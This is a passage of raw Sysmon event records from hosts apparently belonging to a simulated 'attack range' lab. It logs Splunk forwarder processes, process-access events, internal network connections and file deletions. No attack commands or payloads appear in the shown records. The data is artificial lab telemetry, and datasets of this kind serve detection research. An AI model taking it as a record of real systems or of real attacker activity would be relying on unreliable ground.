10:55:02.026{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:02.026{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:02.026{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:02.026{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:02.026{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1286-6216-3B05-000000003802}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:02.026{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1286-6216-3B05-000000003802}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:02.028{C8EA50B7-1286-6216-3B05-000000003802}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000217415Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:01.703{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51391-false10.0.1.12-8000- 23542300x8000000000000000217414Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:03.430{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4964B487D97F967FF20FA0821FA819C8,SHA256=BF59B9CB3D7509CE34C66C441FC0CB71A078C21D4B6C9510C0BFA6D90FE4E4D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:03.441{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C292FF095F4DF78CFEDC15E5E7419AD,SHA256=B2C75E2E113A6B2ED2AED4EA9577B41E1EF588FE2BA7BF87E65017E7311D9B3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217417Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:04.601{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3815227EF272164BAC2AD4E4023A25D8,SHA256=CAE8DB25DBA98DC7CCC61AB9BE286044910886A293AB15E6CD7BA42B535A8EC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:02.489{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53538-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:04.499{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6E85E10939ABDC02495D559BC767CDC,SHA256=C4C03B4B530FC8D77B62759A610F8676B320900D2EF88462231A64A37272F7F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217416Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:04.371{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-138MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:04.211{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1288-6216-3C05-000000003802}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:04.211{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:04.211{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:04.211{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:04.211{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:04.211{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1288-6216-3C05-000000003802}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:04.211{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1288-6216-3C05-000000003802}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:04.212{C8EA50B7-1288-6216-3C05-000000003802}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217419Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:05.833{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61213830BF8D42FABD6FE490F09C47C5,SHA256=FD2357FDE9500609FDB638433B497A2E69BC9ECA37EA9B6C19C1F5EF62AC2EEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:03.216{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53539-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000289549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:03.216{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53539-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000289548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:05.511{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=573D15DA550B89FA083A4A1F290BEB9E,SHA256=2BF8E7D15AD939C1892BCADF2C7CFAA57259E111AB7CAC861153B115B8943D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217418Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:05.383{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-139MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217420Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:06.835{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE28E426C499F7A55679CA7AF4DF9879,SHA256=E74D1D64877D7C822E62926014A252E25749753638EEA9C5DCED99593220B0A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:06.542{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0353B2AD5021A79248EC7CACC2537492,SHA256=5B7C7E5A631C1D561922D5C46386F28A175A315E195FAED359BAE6C765DF6582,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:06.511{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=95E8E4ADE153462335462501B0B4F5C8,SHA256=CF4AB48D8946FB4DE56E39618890BE8AD2B7341BE5482914063F2EB2DB0943F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217421Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:07.866{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4522F9869741D8843C5CD687D4DC19F0,SHA256=E98BCAB90524C648E104502DCBE9B0E536B779210E8A9425135E413A0EC85D87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:07.574{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECCD50BE9E67640E299E4EFB05719DA0,SHA256=50EFBAD9B448BC386547A74A7D16705A2FE02E9D837EEAD0B1DF96EC9F3F6F2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217422Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:08.913{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19186AE09871ED21A42FFB7FAA69DA2B,SHA256=0F79C6169E39CC61AD4EF3D841492F01DA6179DDA8542791B7C8FAA8FB321BCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:08.574{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B9D7E6D8F92B19D166F314235A43629,SHA256=91B1AEE9623626FC98FF8333E23B6B7A944629F49A5D32197C839C05B9F11AAA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217424Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:07.484{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51392-false10.0.1.12-8000- 23542300x8000000000000000217423Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:09.928{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3A9572E09C0BFC4FCD85631FBC20C39,SHA256=8E8EEF33FF80197D26E0EE6AB2E278DECF4A48396ACA3E8D917A81C576DD8832,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:09.595{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFCF35357D547B62F37164543615EB12,SHA256=AB030FB3C132ACA5E44DF04BE5FADB81E48D3B1AF8965C3D3AAFC64ECCE54B96,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:07.562{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53540-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000217425Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:10.975{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program 